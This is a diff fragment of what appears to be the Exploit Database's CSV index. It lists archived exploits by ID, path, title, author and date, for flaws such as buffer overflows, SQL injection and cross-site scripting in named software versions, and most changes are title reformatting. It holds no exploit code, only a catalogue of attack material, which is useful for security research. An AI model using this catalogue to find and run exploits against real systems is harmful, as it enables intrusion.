+23240,platforms/windows/dos/23240.pl,"mIRC 6.1 - DCC SEND Buffer Overflow (1)",2003-10-13,"Takara Takaishi",windows,dos,0 +23241,platforms/windows/dos/23241.pl,"mIRC 6.1 - DCC SEND Buffer Overflow (2)",2003-10-13,DarkAngel,windows,dos,0 23242,platforms/windows/dos/23242.pl,"WinSyslog Interactive Syslog Server 4.21 - long Message Remote Denial of Service",2003-10-14,storm@securiteam.com,windows,dos,0 -23243,platforms/windows/remote/23243.py,"Free Float FTP Server USER Command Buffer Overflow",2012-12-09,D35m0nd142,windows,remote,0 +23243,platforms/windows/remote/23243.py,"Free Float FTP Server - USER Command Buffer Overflow",2012-12-09,D35m0nd142,windows,remote,0 23244,platforms/php/webapps/23244.txt,"WrenSoft Zoom Search Engine 2.0 Build: 1018 - Cross-Site Scripting",2003-10-14,Ezhilan,php,webapps,0 23245,platforms/linux/dos/23245.pl,"Apache Tomcat 4.0.x - Non-HTTP Request Denial of Service",2003-10-15,"Oliver Karow",linux,dos,0 23246,platforms/windows/dos/23246.txt,"SumatraPDF 2.1.1/MuPDF 1.0 - Integer Overflow",2012-12-09,beford,windows,dos,0 @@ -20493,7 +20489,7 @@ id,file,description,date,author,platform,type,port 23264,platforms/php/webapps/23264.txt,"DeskPro 1.1 - Multiple SQL Injection",2003-10-20,"Aviram Jenik",php,webapps,0 23265,platforms/windows/remote/23265.txt,"Sun Java Plugin 1.4.2 _01 - Cross-Site Applet Sandbox Security Model Violation",2003-10-20,"Marc Schoenefeld",windows,remote,0 23266,platforms/cgi/webapps/23266.txt,"Dansie Shopping Cart - Server Error Message Installation Path Disclosure",2003-10-20,Dr`Ponidi,cgi,webapps,0 -23267,platforms/windows/dos/23267.txt,"Atrium Software Mercur Mailserver 3.3/4.0/4.2 IMAP AUTH Remote Buffer Overflow",2003-10-20,"Kostya KORTCHINSKY",windows,dos,0 +23267,platforms/windows/dos/23267.txt,"Atrium Software Mercur Mailserver 3.3/4.0/4.2 - IMAP AUTH Remote Buffer Overflow",2003-10-20,"Kostya KORTCHINSKY",windows,dos,0 23268,platforms/java/webapps/23268.txt,"Vivisimo Clustering Engine - Search Script Cross-Site Scripting",2003-10-21,ComSec,java,webapps,0 23269,platforms/php/webapps/23269.txt,"FuzzyMonkey 2.11 - MyClassifieds Email Variable SQL Injection",2003-10-21,Ezhilan,php,webapps,0 23270,platforms/windows/remote/23270.java,"Sun Java Plugin 1.4 - Unauthorized Java Applet Floppy Access Weakness",2003-10-21,"Marc Schoenefeld",windows,remote,0 @@ -20505,7 +20501,7 @@ id,file,description,date,author,platform,type,port 23276,platforms/multiple/dos/23276.java,"Sun Java Virtual Machine 1.x - Slash Path Security Model Circumvention",2003-10-22,"Last Stage of Delirium",multiple,dos,0 23387,platforms/windows/remote/23387.txt,"netserve Web server 1.0.7 - Directory Traversal",2003-11-17,nimber@designer.ru,windows,remote,0 23388,platforms/windows/dos/23388.txt,"Valve Software Half-Life Dedicated Server 3.1/4.1 - Information Disclosure/DOS",2003-11-19,3APA3A,windows,dos,0 -23389,platforms/openbsd/dos/23389.c,"OpenBSD 3.3/3.4 sysctl Local Denial of Service",2003-11-19,anonymous,openbsd,dos,0 +23389,platforms/openbsd/dos/23389.c,"OpenBSD 3.3/3.4 sysctl - Local Denial of Service",2003-11-19,anonymous,openbsd,dos,0 23279,platforms/windows/dos/23279.txt,"DIMIN Viewer 5.4.0 - Crash PoC",2012-12-10,"Jean Pascal Pereira",windows,dos,0 23280,platforms/windows/dos/23280.txt,"FreeVimager 4.1.0 - Crash PoC",2012-12-10,"Jean Pascal Pereira",windows,dos,0 23282,platforms/multiple/remote/23282.txt,"apache cocoon 2.14/2.2 - Directory Traversal",2003-10-24,"Thierry De Leeuw",multiple,remote,0 @@ -20517,18 +20513,18 @@ id,file,description,date,author,platform,type,port 23288,platforms/windows/dos/23288.txt,"IrfanView 4.33 - IMXCF.DLL Plugin Code Execution",2012-12-11,beford,windows,dos,0 23289,platforms/php/webapps/23289.txt,"PHP-Nuke 8.2.4 - CSRF",2012-12-11,sajith,php,webapps,0 23290,platforms/windows/remote/23290.rb,"HP Data Protector - DtbClsLogin Buffer Overflow",2012-12-11,Metasploit,windows,remote,0 -23313,platforms/php/webapps/23313.txt,"Ledscripts LedForums Multiple Fileds HTML Injection",2003-10-30,ProXy,php,webapps,0 -23291,platforms/multiple/remote/23291.txt,"Opera Web Browser 7 IFRAME Zone Restriction Bypass",2003-10-24,Mindwarper,multiple,remote,0 +23313,platforms/php/webapps/23313.txt,"Ledscripts LedForums - Multiple Fileds HTML Injection",2003-10-30,ProXy,php,webapps,0 +23291,platforms/multiple/remote/23291.txt,"Opera Web Browser 7 - IFRAME Zone Restriction Bypass",2003-10-24,Mindwarper,multiple,remote,0 23292,platforms/multiple/dos/23292.java,"Sun Microsystems Java Virtual Machine 1.x - Security Manager Denial of Service",2003-10-26,"Marc Schoenefeld",multiple,dos,0 23293,platforms/windows/dos/23293.txt,"Yahoo! Messenger 5.6 - File Transfer Buffer Overrun",2003-10-27,"Hat-Squad Security Team",windows,dos,0 23294,platforms/php/webapps/23294.txt,"Chi Kien Uong Guestbook 1.51 - Cross-Site Scripting",2003-10-27,"Joshua P. Miller",php,webapps,0 -23295,platforms/linux/remote/23295.txt,"SH-HTTPD 0.3/0.4 Character Filtering Remote Information Disclosure",2003-10-27,"dong-h0un U",linux,remote,0 +23295,platforms/linux/remote/23295.txt,"SH-HTTPD 0.3/0.4 - Character Filtering Remote Information Disclosure",2003-10-27,"dong-h0un U",linux,remote,0 23296,platforms/linux/remote/23296.txt,"Red Hat Apache 2.0.40 - Directory Index Default Configuration Error",2003-10-27,TfM,linux,remote,0 23297,platforms/linux/local/23297.c,"Musicqueue 1.2 SIGSEGV Signal Handler Insecure File Creation",2003-10-27,"dong-h0un U",linux,local,0 23298,platforms/windows/remote/23298.txt,"Macromedia Flash Player 6.0.x - Flash Cookie Predictable File Location Weakness",2003-10-24,Mindwarper,windows,remote,0 -23299,platforms/linux/local/23299.c,"IWConfig Local ARGV Command Line Buffer Overflow (1)",2003-10-27,axis,linux,local,0 -23300,platforms/linux/local/23300.c,"IWConfig Local ARGV Command Line Buffer Overflow (2)",2003-11-11,heka,linux,local,0 -23301,platforms/linux/local/23301.c,"IWConfig Local ARGV Command Line Buffer Overflow (3)",2003-10-27,NrAziz,linux,local,0 +23299,platforms/linux/local/23299.c,"IWConfig - Local ARGV Command Line Buffer Overflow (1)",2003-10-27,axis,linux,local,0 +23300,platforms/linux/local/23300.c,"IWConfig - Local ARGV Command Line Buffer Overflow (2)",2003-11-11,heka,linux,local,0 +23301,platforms/linux/local/23301.c,"IWConfig - Local ARGV Command Line Buffer Overflow (3)",2003-10-27,NrAziz,linux,local,0 23302,platforms/php/webapps/23302.txt,"Les Visiteurs 2.0 - Remote File Inclusion",2003-10-27,"Matthieu Peschaud",php,webapps,0 23303,platforms/linux/local/23303.c,"Musicqueue 0.9/1.0/1.1 - Multiple Buffer Overrun Vulnerabilities",2003-10-27,"dong-h0un U",linux,local,0 23304,platforms/cgi/remote/23304.txt,"Symantec Norton Internet Security 2003 6.0.4.34 - Error Message Cross-Site Scripting",2003-10-27,KrazySnake,cgi,remote,0 @@ -20540,10 +20536,10 @@ id,file,description,date,author,platform,type,port 23310,platforms/windows/dos/23310.pl,"TelCondex SimpleWebserver 2.12.30210 build 3285 - HTTP Referer Remote Buffer Overflow",2003-10-29,"Oliver Karow",windows,dos,0 23311,platforms/php/dos/23311.txt,"E107 - Chatbox.php Denial of Service",2003-10-29,Blademaster,php,dos,0 23312,platforms/cgi/remote/23312.txt,"BEA Tuxedo 6/7/8 and WebLogic Enterprise 4/5 Input Validation",2003-10-30,"Corsaire Limited",cgi,remote,0 -23315,platforms/jsp/webapps/23315.txt,"BEA WebLogic 6/7/8 InteractiveQuery.jsp Cross-Site Scripting",2003-10-31,"Corsaire Limited",jsp,webapps,0 +23315,platforms/jsp/webapps/23315.txt,"BEA WebLogic 6/7/8 - InteractiveQuery.jsp Cross-Site Scripting",2003-10-31,"Corsaire Limited",jsp,webapps,0 23316,platforms/windows/remote/23316.txt,"Citrix Metaframe XP - Cross-Site Scripting",2003-10-31,"Andy Davis",windows,remote,0 23317,platforms/hardware/remote/23317.txt,"Seyeon FlexWATCH Network Video Server 2.2 - Unauthorized Administrative Access",2003-10-31,slaizer,hardware,remote,0 -23318,platforms/windows/remote/23318.txt,"Ashley Brown iWeb Server Encoded Backslash Directory Traversal",2003-10-31,cr-secure.net,windows,remote,0 +23318,platforms/windows/remote/23318.txt,"Ashley Brown iWeb Server - Encoded Backslash Directory Traversal",2003-10-31,cr-secure.net,windows,remote,0 23319,platforms/php/webapps/23319.txt,"Tritanium Scripts Tritanium Bulletin Board 1.2.3 - Unauthorized Access",2003-10-31,"Virginity Security",php,webapps,0 23320,platforms/multiple/remote/23320.txt,"Mldonkey 2.5 -4 - Web Interface Error Message Cross-Site Scripting",2003-10-31,"Chris Sharp",multiple,remote,0 23321,platforms/windows/remote/23321.txt,"Microsoft Internet Explorer 6 < 10 - Mouse Tracking",2012-12-12,"Nick Johnson",windows,remote,0 @@ -20553,13 +20549,13 @@ id,file,description,date,author,platform,type,port 23325,platforms/multiple/dos/23325.c,"BRS WebWeaver 1.06 httpd - 'User-Agent' Remote Denial of Service",2003-11-01,D4rkGr3y,multiple,dos,0 23326,platforms/asp/webapps/23326.txt,"http commander 4.0 - Directory Traversal",2003-11-01,"Zero X",asp,webapps,0 23327,platforms/windows/local/23327.txt,"DATEV Nutzungskontrolle 2.1/2.2 - Unauthorized Access",2003-11-01,t4rku5,windows,local,0 -23328,platforms/windows/remote/23328.py,"Nullsoft SHOUTcast 1.9.2 icy-name/icy-url Memory Corruption (1)",2003-11-03,airsupply,windows,remote,0 -23329,platforms/windows/remote/23329.c,"Nullsoft SHOUTcast 1.9.2 icy-name/icy-url Memory Corruption (2)",2003-11-03,exworm,windows,remote,0 +23328,platforms/windows/remote/23328.py,"Nullsoft SHOUTcast 1.9.2 - icy-name/icy-url Memory Corruption (1)",2003-11-03,airsupply,windows,remote,0 +23329,platforms/windows/remote/23329.c,"Nullsoft SHOUTcast 1.9.2 - icy-name/icy-url Memory Corruption (2)",2003-11-03,exworm,windows,remote,0 23330,platforms/php/webapps/23330.txt,"Synthetic Reality SymPoll 1.5 - Cross-Site Scripting",2003-11-03,"Michael Frame",php,webapps,0 23331,platforms/asp/webapps/23331.txt,"Web Wiz Forum 6.34/7.0/7.5 - Unauthorized Private Forum Access",2003-11-03,"Alexander Antipov",asp,webapps,0 23332,platforms/cgi/webapps/23332.txt,"MPM Guestbook 1.2 - Cross-Site Scripting",2003-11-03,"David Ferreira",cgi,webapps,0 23333,platforms/php/webapps/23333.txt,"PHPKit 1.6 - Include.php Cross-Site Scripting",2003-11-02,ben.moeckel@badwebmasters.net,php,webapps,0 -23334,platforms/windows/remote/23334.pl,"IA WebMail Server 3.0/3.1 Long GET Request Buffer Overrun",2003-11-03,"Peter Winter-Smith",windows,remote,0 +23334,platforms/windows/remote/23334.pl,"IA WebMail Server 3.0/3.1 - Long GET Request Buffer Overrun",2003-11-03,"Peter Winter-Smith",windows,remote,0 23335,platforms/asp/webapps/23335.txt,"VieNuke VieBoard 2.6 - SQL Injection",2003-11-03,ekerazha@yahoo.it,asp,webapps,0 23336,platforms/php/webapps/23336.txt,"OpenAutoClassifieds 1.0 - Listing Parameter Cross-Site Scripting",2003-11-04,"David Sopas Ferreira",php,webapps,0 23337,platforms/windows/dos/23337.c,"Avaya Argent Office - Malformed DNS Packet Denial of Service",2001-08-07,"Jacek Lipkowski",windows,dos,0 @@ -20568,13 +20564,13 @@ id,file,description,date,author,platform,type,port 23340,platforms/windows/remote/23340.txt,"Microsoft Internet Explorer 6.0 - Double Slash Cache Zone Bypass",2003-10-05,"Liu Die Yu",windows,remote,0 23341,platforms/hp-ux/local/23341.c,"HP-UX 10/11 - NLSPATH Environment Variable Format String (1)",2003-04-01,watercloud,hp-ux,local,0 23342,platforms/hp-ux/local/23342.c,"HP-UX 10/11 - NLSPATH Environment Variable Format String (2)",2003-04-01,watercloud,hp-ux,local,0 -23343,platforms/hp-ux/local/23343.c,"HP-UX 11 Software Distributor Lang Environment Variable Local Buffer Overrun",2002-12-11,watercloud,hp-ux,local,0 +23343,platforms/hp-ux/local/23343.c,"HP-UX 11 - Software Distributor Lang Environment Variable Local Buffer Overrun",2002-12-11,watercloud,hp-ux,local,0 23344,platforms/linux/local/23344.txt,"IBM DB2 - db2start Format String Arbitrary Code Execution",2003-11-07,SNOSoft,linux,local,0 23345,platforms/linux/local/23345.txt,"IBM DB2 - db2stop Format String Arbitrary Code Execution",2003-11-07,SNOSoft,linux,local,0 23346,platforms/linux/local/23346.txt,"IBM DB2 - db2govd Format String Arbitrary Code Execution",2003-11-07,SNOSoft,linux,local,0 -23347,platforms/linux/dos/23347.txt,"IBM DB2 db2start Command Line Argument Local Overflow",2003-11-07,SNOSoft,linux,dos,0 -23348,platforms/linux/dos/23348.txt,"IBM DB2 db2stop Command Line Argument Local Overflow",2003-11-07,SNOSoft,linux,dos,0 -23349,platforms/linux/dos/23349.txt,"IBM DB2 db2govd Command Line Argument Local Overflow",2003-11-07,SNOSoft,linux,dos,0 +23347,platforms/linux/dos/23347.txt,"IBM DB2 db2start - Command Line Argument Local Overflow",2003-11-07,SNOSoft,linux,dos,0 +23348,platforms/linux/dos/23348.txt,"IBM DB2 db2stop - Command Line Argument Local Overflow",2003-11-07,SNOSoft,linux,dos,0 +23349,platforms/linux/dos/23349.txt,"IBM DB2 db2govd - Command Line Argument Local Overflow",2003-11-07,SNOSoft,linux,dos,0 23350,platforms/linux/local/23350.c,"TerminatorX 3.8 - Multiple Command-Line and Environment Buffer Overrun Vulnerabilities (1)",2003-11-07,c0wboy,linux,local,0 23351,platforms/linux/local/23351.c,"TerminatorX 3.8 - Multiple Command-Line and Environment Buffer Overrun Vulnerabilities (2)",2003-11-07,Bobby,linux,local,0 23352,platforms/linux/local/23352.c,"TerminatorX 3.8 - Multiple Command-Line and Environment Buffer Overrun Vulnerabilities (3)",2003-11-07,"m00 security",linux,local,0 @@ -20583,11 +20579,10 @@ id,file,description,date,author,platform,type,port 23355,platforms/php/webapps/23355.txt,"Facebook Profile MyBB Plugin 2.4 - Persistant XSS",2012-12-13,limb0,php,webapps,0 23356,platforms/php/webapps/23356.txt,"Portable phpMyAdmin WordPress Plugin - Authentication Bypass",2012-12-13,"Mark Stanislav",php,webapps,0 23384,platforms/php/webapps/23384.txt,"Koch Roland Rolis Guestbook 1.0 - $path Remote File Inclusion",2003-11-17,"RusH security team",php,webapps,0 -23385,platforms/multiple/remote/23385.txt,"PostMaster 3.16/3.17 Proxy Service Cross-Site Scripting",2003-11-17,"Ziv Kamir",multiple,remote,0 +23385,platforms/multiple/remote/23385.txt,"PostMaster 3.16/3.17 Proxy Service - Cross-Site Scripting",2003-11-17,"Ziv Kamir",multiple,remote,0 23382,platforms/php/webapps/23382.txt,"Social Sites MyBB Plugin 0.2.2 - Cross-Site Scripting",2012-12-14,s3m00t,php,webapps,0 23386,platforms/php/webapps/23386.txt,"Justin Hagstrom Auto Directory Index 1.2.3 - Cross-Site Scripting",2003-11-17,"David Sopas Ferreira",php,webapps,0 23359,platforms/php/webapps/23359.txt,"MyBB DyMy User Agent Plugin - (newreply.php) SQL Injection",2012-12-13,JoinSe7en,php,webapps,0 -23360,platforms/linux/remote/23360.rb,"PostgreSQL for Linux Payload Execution",2012-12-13,Metasploit,linux,remote,0 23361,platforms/hardware/dos/23361.txt,"Cisco Wireless Lan Controller 7.2.110.0 - Multiple Vulnerabilities",2012-12-13,"Jacob Holcomb",hardware,dos,0 23362,platforms/php/webapps/23362.py,"Centreon Enterprise Server 2.3.3-2.3.9-4 - Blind SQL Injection",2012-12-13,modpr0be,php,webapps,0 23363,platforms/php/webapps/23363.txt,"phpBB 2.0.x - Profile.php SQL Injection",2003-11-08,JOCANOR,php,webapps,0 @@ -20601,7 +20596,7 @@ id,file,description,date,author,platform,type,port 23371,platforms/linux/remote/23371.c,"Hylafax 4.1.x - HFaxD Unspecified Format String",2003-11-10,"Sebastian Krahmer",linux,remote,0 23372,platforms/php/webapps/23372.txt,"PHP-Coolfile 1.4 - Unauthorized Administrative Access",2003-11-11,r00t@rsteam.ru,php,webapps,0 23373,platforms/windows/remote/23373.html,"Opera Web Browser 7.x - URI Handler Directory Traversal",2003-11-12,S.G.Masood,windows,remote,0 -23374,platforms/windows/dos/23374.pl,"Qualcomm Eudora 5.x/6.0 Spoofed Attachment Line Denial of Service",2003-11-12,"Paul Szabo",windows,dos,0 +23374,platforms/windows/dos/23374.pl,"Qualcomm Eudora 5.x/6.0 - Spoofed Attachment Line Denial of Service",2003-11-12,"Paul Szabo",windows,dos,0 23375,platforms/linux/dos/23375.txt,"GNU Zebra 0.9x / Quagga 0.96 - Remote Denial of Service",2003-11-12,"Jonny Robertson",linux,dos,0 23376,platforms/hardware/remote/23376.txt,"FortiGate Firewall 2.x - dlg Admin Interface XSS",2003-11-12,"Maarten Hartsuijker",hardware,remote,0 23377,platforms/hardware/remote/23377.txt,"FortiGate Firewall 2.x - Policy Admin Interface XSS",2003-11-12,"Maarten Hartsuijker",hardware,remote,0 @@ -20611,28 +20606,28 @@ id,file,description,date,author,platform,type,port 23381,platforms/php/webapps/23381.txt,"phpWebFileManager 2.0 - index.php Directory Traversal",2003-11-17,"RusH security team",php,webapps,0 23390,platforms/multiple/dos/23390.txt,"EffectOffice Server 2.6 - Remote Service Buffer Overflow",2003-11-20,D_BuG,multiple,dos,0 23391,platforms/linux/dos/23391.txt,"FreeRADIUS 0.x/1.1.x - Tag Field Heap Corruption",2003-11-20,"Evgeny Legerov",linux,dos,0 -23392,platforms/openbsd/dos/23392.c,"OpenBSD 3.3/3.4 semctl/semop Local Unexpected Array Indexing",2003-11-21,anonymous,openbsd,dos,0 +23392,platforms/openbsd/dos/23392.c,"OpenBSD 3.3/3.4 - semctl/semop Local Unexpected Array Indexing",2003-11-21,anonymous,openbsd,dos,0 23393,platforms/linux/dos/23393.c,"GEdit 2.0/2.2 Large IOStream File Memory Corruption",2003-11-23,MegaHz,linux,dos,0 23394,platforms/hardware/dos/23394.c,"Thomson Cablemodem TCM315 - Denial of Service",2003-11-24,"Shell security group",hardware,dos,0 23395,platforms/cgi/webapps/23395.txt,"CommerceSQL Shopping Cart 2.2 - index.cgi Directory Traversal",2003-11-24,"Mariusz Ciesla",cgi,webapps,0 23396,platforms/multiple/remote/23396.txt,"SIRCD Server 0.5.2/0.5.3 - Operator Privilege Escalation",2003-11-20,"Victor Jerlin",multiple,remote,0 -23397,platforms/linux/remote/23397.pl,"Monit 1.4/2.x/3/4 Overly Long HTTP Request Buffer Overrun",2003-11-24,Shadowinteger,linux,remote,0 -23398,platforms/windows/remote/23398.pl,"Qualcomm Eudora 6.0.1/6.1.1 Attachment LaunchProtect Warning Bypass Weakness (1)",2003-11-25,"Paul Szabo",windows,remote,0 -23399,platforms/windows/remote/23399.pl,"Qualcomm Eudora 6.0.1/6.1.1 Attachment LaunchProtect Warning Bypass Weakness (2)",2003-11-25,"Paul Szabo",windows,remote,0 +23397,platforms/linux/remote/23397.pl,"Monit 1.4/2.x/3/4 - Overly Long HTTP Request Buffer Overrun",2003-11-24,Shadowinteger,linux,remote,0 +23398,platforms/windows/remote/23398.pl,"Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass Weakness (1)",2003-11-25,"Paul Szabo",windows,remote,0 +23399,platforms/windows/remote/23399.pl,"Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass Weakness (2)",2003-11-25,"Paul Szabo",windows,remote,0 23400,platforms/windows/remote/23400.txt,"Microsoft Outlook Express 6.0 - MHTML Forced File Execution (1)",2003-11-25,"Liu Die",windows,remote,0 23401,platforms/windows/remote/23401.txt,"Microsoft Outlook Express 6.0 - MHTML Forced File Execution (2)",2003-11-25,"Liu Die Yu",windows,remote,0 23402,platforms/jsp/webapps/23402.txt,"Macromedia JRun 4.0 build 61650 - Administrative Interface Multiple Cross-Site Scripting Vulnerabilities",2003-11-26,dr_insane,jsp,webapps,0 23403,platforms/php/webapps/23403.pl,"My_EGallery Module 3.1.1 - Remote File Inclusion Command Injection",2003-11-26,"Bojan Zdrnja",php,webapps,0 23405,platforms/multiple/remote/23405.c,"Applied Watch Command Center 1.0 - Authentication Bypass (2)",2003-11-28,"Bugtraq Security",multiple,remote,0 -23406,platforms/php/webapps/23406.txt,"CuteNews 1.3 Debug Query Information Disclosure Weakness",2003-12-01,scrap,php,webapps,0 +23406,platforms/php/webapps/23406.txt,"CuteNews 1.3 - Debug Query Information Disclosure Weakness",2003-12-01,scrap,php,webapps,0 23407,platforms/asp/webapps/23407.txt,"Virtual Programming VP-ASP 4.00/5.00 - shopsearch.asp SQL Injection",2003-12-01,"Nick Gudov",asp,webapps,0 23408,platforms/asp/webapps/23408.txt,"Virtual Programming VP-ASP 4.00/5.00 - shopdisplayproducts.asp SQL Injection",2003-12-01,"Nick Gudov",asp,webapps,0 23409,platforms/cgi/webapps/23409.c,"Jason Maloney's Guestbook 3.0 - Remote Command Execution",2003-12-01,shaun2k2,cgi,webapps,0 -23410,platforms/cgi/webapps/23410.txt,"IBM Directory Server 4.1 Web Administration Interface Cross-Site Scripting",2003-12-02,"Oliver Karow",cgi,webapps,0 -23411,platforms/windows/remote/23411.txt,"Websense Enterprise 4/5 Blocked Sites Cross-Site Scripting",2003-12-03,"Mr. P.Taylor",windows,remote,0 +23410,platforms/cgi/webapps/23410.txt,"IBM Directory Server 4.1 - Web Administration Interface Cross-Site Scripting",2003-12-02,"Oliver Karow",cgi,webapps,0 +23411,platforms/windows/remote/23411.txt,"Websense Enterprise 4/5 - Blocked Sites Cross-Site Scripting",2003-12-03,"Mr. P.Taylor",windows,remote,0 23412,platforms/windows/dos/23412.pl,"EZPhotoShare 1.0/1.1 - Memory Corruption",2003-12-03,Winter-Smith,windows,dos,0 23413,platforms/linux/remote/23413.c,"PLD Software Ebola 0.1.4 - Buffer Overflow",2003-12-05,c0wboy,linux,remote,0 -23414,platforms/linux/local/23414.txt,"FVWM 2.4/2.5 fvwm-menu-directory Command Execution",2003-12-05,auto22238,linux,local,0 +23414,platforms/linux/local/23414.txt,"FVWM 2.4/2.5 - fvwm-menu-directory Command Execution",2003-12-05,auto22238,linux,local,0 23415,platforms/asp/webapps/23415.txt,"Virtual Programming VP-ASP 4/5 - shopdisplayproducts.asp Cross-Site Scripting",2003-12-05,"Xnuxer Research",asp,webapps,0 23416,platforms/php/webapps/23416.txt,"Xoops 1.3.x/2.0.x - Multiple Vulnerabilities",2003-12-06,frog,php,webapps,0 23417,platforms/windows/remote/23417.c,"EZMeeting 3.x - EZNet.EXE Long HTTP Request Remote Buffer Overflow",2003-12-08,kralor,windows,remote,0 @@ -20643,9 +20638,9 @@ id,file,description,date,author,platform,type,port 23422,platforms/windows/remote/23422.txt,"Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation Weakness (1)",2003-12-09,"Guy Crumpley",windows,remote,0 23423,platforms/windows/remote/23423.txt,"Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation Weakness (2)",2003-12-09,"Zap The Dingbat",windows,remote,0 23425,platforms/php/webapps/23425.txt,"MyBB User Profile Skype ID Plugin 1.0 - Stored XSS",2012-12-16,limb0,php,webapps,0 -23449,platforms/unix/remote/23449.txt,"Xerox MicroServer Web Server Remote Directory Traversal",2003-12-19,"J.A. Gutierrez",unix,remote,0 -23450,platforms/windows/remote/23450.txt,"PY Software Active Webcam 4.3 Webserver Directory Traversal",2003-12-19,"Luigi Auriemma",windows,remote,0 -23451,platforms/windows/remote/23451.txt,"PY Software Active Webcam 4.3 Webserver Cross-Site Scripting",2003-12-19,"Luigi Auriemma",windows,remote,0 +23449,platforms/unix/remote/23449.txt,"Xerox MicroServer - Web Server Remote Directory Traversal",2003-12-19,"J.A. Gutierrez",unix,remote,0 +23450,platforms/windows/remote/23450.txt,"PY Software Active Webcam 4.3 - Webserver Directory Traversal",2003-12-19,"Luigi Auriemma",windows,remote,0 +23451,platforms/windows/remote/23451.txt,"PY Software Active Webcam 4.3 - Webserver Cross-Site Scripting",2003-12-19,"Luigi Auriemma",windows,remote,0 23452,platforms/linux/dos/23452.txt,"Tcpdump 3.x - L2TP Parser Remote Denial of Service",2003-12-20,"Przemyslaw Frasunek",linux,dos,0 23427,platforms/linux/dos/23427.txt,"Totem Movie Player 3.4.3 (Ubuntu) - Stack Corruption",2012-12-16,coolkaveh,linux,dos,0 23428,platforms/php/webapps/23428.html,"Mambo 4.5 Server - user.php Script Unauthorized Access",2003-12-10,frog,php,webapps,0 @@ -20653,7 +20648,7 @@ id,file,description,date,author,platform,type,port 23430,platforms/php/webapps/23430.txt,"Mambo Open Source 4.0.14 - PollBooth.php Multiple SQL Injection",2003-12-10,frog,php,webapps,0 23431,platforms/multiple/dos/23431.pl,"SX Design sipd 0.1.2 - Remote Denial of Service",2003-12-11,storm,multiple,dos,0 23432,platforms/cgi/webapps/23432.txt,"RemotelyAnywhere - Default.HTML Logout Message Injection Weakness",2003-12-11,"Oliver Karow",cgi,webapps,0 -23433,platforms/multiple/remote/23433.txt,"Mozilla Browser 1.5 URI MouseOver Obfuscation Weakness",2003-12-11,netmask,multiple,remote,0 +23433,platforms/multiple/remote/23433.txt,"Mozilla Browser 1.5 - URI MouseOver Obfuscation Weakness",2003-12-11,netmask,multiple,remote,0 23434,platforms/php/webapps/23434.pl,"osCommerce 2.2 - SQL Injection",2003-12-13,JeiAr,php,webapps,0 23435,platforms/windows/remote/23435.c,"DameWare Mini Remote Control Server 3.7x - Pre-Authentication Buffer Overflow (1)",2003-12-16,Adik,windows,remote,0 23436,platforms/windows/remote/23436.c,"DameWare Mini Remote Control Server 3.7x - Pre-Authentication Buffer Overflow (2)",2003-12-16,kralor,windows,remote,0 @@ -20681,10 +20676,10 @@ id,file,description,date,author,platform,type,port 23462,platforms/php/webapps/23462.txt,"osCommerce 2.2 - products_id URI Parameter SQL Injection",2003-12-22,JeiAr,php,webapps,0 23463,platforms/php/webapps/23463.txt,"osCommerce 2.2 - manufacturers_id Parameter Cross-Site Scripting",2003-12-22,JeiAr,php,webapps,0 23464,platforms/windows/remote/23464.pl,"Opera 7.x - Relative Path Directory Traversal File Corruption",2003-11-15,nesumin,windows,remote,0 -23465,platforms/windows/remote/23465.txt,"Opera Browser 6.0 6 URI Display Obfuscation Weakness",2003-12-23,nesumin,windows,remote,0 +23465,platforms/windows/remote/23465.txt,"Opera Browser 6.0 6 - URI Display Obfuscation Weakness",2003-12-23,nesumin,windows,remote,0 23466,platforms/cgi/webapps/23466.txt,"iSoft-Solutions QuikStore Shopping Cart 2.12 - store Parameter Path Disclosure",2003-12-23,"Dr Ponidi Haryanto",cgi,webapps,0 23467,platforms/cgi/webapps/23467.txt,"iSoft-Solutions QuikStore Shopping Cart 2.12 - template Parameter Directory Traversal",2003-12-23,"Dr Ponidi Haryanto",cgi,webapps,0 -23468,platforms/windows/dos/23468.pl,"Xlight FTP Server 1.25/1.41 PASS Command Remote Buffer Overflow",2003-12-23,storm,windows,dos,0 +23468,platforms/windows/dos/23468.pl,"Xlight FTP Server 1.25/1.41 - PASS Command Remote Buffer Overflow",2003-12-23,storm,windows,dos,0 23469,platforms/windows/dos/23469.txt,"Adobe Flash Player 11.5.502.135 - Crash PoC",2012-12-18,coolkaveh,windows,dos,0 23629,platforms/cgi/webapps/23629.txt,"Leif M. Wright Web Blog 1.1 - Remote Command Execution",2004-01-31,ActualMInd,cgi,webapps,0 23472,platforms/windows/remote/23472.rb,"Crystal Reports CrystalPrintControl - ActiveX ServerResourceVersion Property Overflow",2012-12-18,Metasploit,windows,remote,0 @@ -20700,8 +20695,8 @@ id,file,description,date,author,platform,type,port 23481,platforms/linux/local/23481.c,"Apache 2.0.4x mod_php Module - File Descriptor Leakage (1)",2003-12-26,"Steve Grubb",linux,local,0 23482,platforms/linux/local/23482.c,"Apache 2.0.4x mod_php Module - File Descriptor Leakage (2)",2003-12-26,"frauk\x41ser",linux,local,0 23483,platforms/php/webapps/23483.txt,"OpenBB 1.0 - Board.php Cross-Site Scripting",2003-12-27,gr00vy,php,webapps,0 -23484,platforms/php/webapps/23484.txt,"PHP-Nuke 6.x/7.0 Survey Module SQL Injection",2003-12-27,idtwolf@pisem.net,php,webapps,0 -23485,platforms/cgi/webapps/23485.txt,"L-Soft 1.8 Listserv Multiple Cross-Site Scripting Vulnerabilities",2003-12-26,http-equiv,cgi,webapps,0 +23484,platforms/php/webapps/23484.txt,"PHP-Nuke 6.x/7.0 Survey Module - SQL Injection",2003-12-27,idtwolf@pisem.net,php,webapps,0 +23485,platforms/cgi/webapps/23485.txt,"L-Soft 1.8 - Listserv Multiple Cross-Site Scripting Vulnerabilities",2003-12-26,http-equiv,cgi,webapps,0 23486,platforms/php/webapps/23486.txt,"Private Message System 2.x - index.php Page Parameter Cross-Site Scripting",2003-12-27,"David S. Ferreira",php,webapps,0 23487,platforms/php/webapps/23487.txt,"php-ping - Count Parameter Command Execution",2003-12-29,ppp-design,php,webapps,0 23488,platforms/cgi/webapps/23488.txt,"BulletScript MailList - bsml.pl Information Disclosure",2003-12-29,M0rf,cgi,webapps,0 @@ -20712,15 +20707,15 @@ id,file,description,date,author,platform,type,port 23493,platforms/windows/remote/23493.txt,"Jordan Windows Telnet Server 1.0/1.2 - Username Stack Based Buffer Overrun (3)",2003-12-29,"Luigi Auriemma",windows,remote,0 